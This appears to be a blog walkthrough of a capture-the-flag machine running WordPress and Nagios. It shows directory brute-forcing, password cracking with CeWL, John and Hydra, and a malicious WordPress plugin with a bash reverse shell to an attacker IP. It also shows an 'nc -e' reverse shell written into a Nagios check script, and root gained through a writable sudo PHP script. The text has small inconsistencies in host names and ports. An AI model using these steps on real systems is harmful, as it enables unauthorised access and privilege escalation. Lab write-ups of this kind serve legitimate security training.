Hint: It must be said that the author mentions that it takes A bit of brute force but we are quite far from reality .
POC
Step 1: Simple start with port scanning -
Press enter or click to view image in full size
as shown in figure 1.1 there are 2 port which we have to enumerate
Lets, start with http port no. 80
Step 2: Simply hit the machine IP in your browser. The machine website not loaded properly and it redirect to www.mideast.htb.
Step 3: Entry hostname in host file for that open /etc/hosts file and add entry of the hostname which is shown below in figure 1.2
Then hit the name or ip in web browser now the website is loading properly.
Press enter or click to view image in full size
After crawling website we find that website is based on wordpress.
You can also use Wappalyzer extension to find out what website are built with.
Step 4: Let’s start with directory brute-forcing using:-
i am using gobuster here. You can also use other tools for directory brute forcing there are lots of tool in market like ffuf, dirsearch, dirb, feroxbuster and many more.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-lits-2.3-medium.txt -u http://www.midwest.htbPress enter or click to view image in full size
hit all the directory, the /nagios directory ask for credentials. After googling the nagios we found that nagios is a free and open-source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services.
We try nagios default credentials but nothing happen
nagiosadmin:PASSW0RD
nagiosadmin:admin
I’m trying with users nagios, nagiosadmin, admin, root which
seem pretty official. I stop after a while because I believe that on a
CTF we should not spend more than 10–20minutes to brute force a user.
Step 5: So I decide to switch to Cewl a tool that will generate a word-list from the words present on the website. The command is also simple:-
cewl http://www.midwest.htb/ > pass.txtThe above command make a word-list of words present in the website.
We get a list of fairly basic and largely useless words (I won’t dwell on my opinion on this tool ) so with the help of this word-list lest make a good word-list with the help of john the ripper tool.
Step 6: From this list we can use John the ripper to generate permutations:
john -rules -wordlist=pass.txt - stdout | sort | uniq > wordlist.txtStep 7: After that brute force with hydra:-
hydra -l nagiosadmin -P wordlist.txt www.midwest.htb http-get /nagiosWe got the credentials.
nagiosadmin:PowerPower
Press enter or click to view image in full size
After login into nagios its seems nothing here
Author hints us to bruteforce
Step 8: So brute force on wordpress now with the help of wordlist we made
Press enter or click to view image in full size
wpscan --disable-tls-checks --url http://www.midwest.htb/ -U admin -P /home/enyo/wordlist.txtPress enter or click to view image in full size
we got the admin password :-
admin:Power9
Step 9: Let’s login wordpress, there is many way to get reverse shell from wordpress :https://www.hackingarticles.in/wordpress-reverse-shell/
Step 10: I use malicious plugin method:
Create a plugin file:
Press enter or click to view image in full size
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.7/443 0>&1'")
?>Convert it into zip:
zip revshell.zip revshell.phpAfter that go to plugin section and upload this malicious plugin and start listener:
nc -nlvp 443
To get the reverse shell Activate Plugin and check your listner
Press enter or click to view image in full size
we got the shell, for proper interactive shell just spawning the shell: https://www.armourinfosec.com/spawning-interactive-reverse-shell/
Get Tushar Singh’s stories in your inbox
Join Medium for free to get updates from this writer.
Lets step forward and escalate its privileges
Privileges Esclation
Crawling the landing directory and home directory then use automate script Linpeas to get the details and find the misconfiguration in the machine.
Linpeas show that there are many directory under /usr/local which have write permission so lets find it with find command.
find / -type f -writable 2> /dev/null | grep -v /var/www | grep -v /procBasically it corresponds to the files in the following folders:
/usr/local/nagios/
/usr/local/nagiosxi/
/var/lib/snmp/mibs/
/usr/local/nagvis/Nagios is monitoring software so firstly lets check its configuration files.
the first folder contain /usr/local/nagios/etc/ndo.cfg which contain the database credentials:
db_user=ndoutils
db_pass=n@gweb
db_name=nagios
db_host=localhost
db_port=3306
db_max_reconnect_attempts=5
Follow that same we have other config file /usr/local/nagiosxi/html/config.inc.php , which also contain the db credentials.
$cfg['db_info'] = array(
"nagiosxi" => array(
"dbtype" => 'mysql',
"dbserver" => '',
"user" => 'nagiosxi',
"pwd" => 'n@gweb',
"db" => 'nagiosxi',
"charset" => "utf8",
"dbmaint" => array(
"max_auditlog_age" => 180,
"max_commands_age" => 480,
"max_events_age" => 480,
"optimize_interval" => 60,
"repair_interval" => 0,
),
),
"nagiosql" => array(
"dbtype" => 'mysql',
"dbserver" => 'localhost',
"user" => 'nagiosql',
"pwd" => 'n@gweb',
"db" => 'nagiosql',
"charset" => "utf8",
"dbmaint" => array(
"max_logbook_age" => 480,
"optimize_interval" => 60,
"repair_interval" => 0,
),
),After login the database and spend some time, we found tbl_command and tbl_service table service have something.
check_ping and Memory Usage this service have something for sure.
The Nagios configuration here must be based on files and indeed I find the ping command defined in /usr/local/nagios/etc/commands.cfg:
define command {
command_name check_ping
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$ -p 5
}The mentioned program is at /usr/local/nagios/libexec/check_ping and it is an ELF binary.
I tried to modify the file cfg but it seems that the modification is not reloaded and I do not have sufficient rights to send a signal to the process Nagios.
Lets check another service Memory Usage /usr/local/nagios/etc/services/localhost.cfg:
define service {
host_name localhost
service_description Memory Usage
use local-service
check_command check_local_mem!30!20
register 1
}However in the services there is one named Memory Usage calling the Command check_local_mem which corresponds to the following entry in /usr/local/nagios/etc/commands.cfg :
define command {
command_name check_local_mem
command_line $USER1$/custom_check_mem -w $ARG1$ -c $ARG2$ -n
}We see that check_local_mem call custom_check_mem so let’s find that
we got the file.
/usr/local/nagios/libexec/custom_check_mem
We have write permission in this lets change the file with our payload.
echo "nohup nc -e /bin/sh 192.168.1.7 4444&" > custom_check_memstart our listener:
nc -nlvp 444We got the shell with nagios user.
read the user flag:
cat /home/nagios/user.txt
7ec306b6fa01510ffc4e0d0fac97c23eLet’s get privileges of ROOT!
Let’s try sudo -l
We find this file with sudo permission /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
and the file “sent_to_nls.php” is also writable let’s change the file and get root.
let’s change the file:
printf "<?php \n system('/bin/bash') \n?>" > /usr/local/nagiosxi/scripts/send_to_nls.phpand run
sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *and finally we got the root!
let’s read the flag
cat root.txt
0d599f0ec05c3bda8c3b8a68c32a1b47n0w ch!ll
Thank You Guys! That’s all from my side.
Hope you found this walkthrough somewhat helpful.
Happy Hacking!
Thanks to Author of the machine: https://twitter.com/renmizo
You can contact me on twitter:-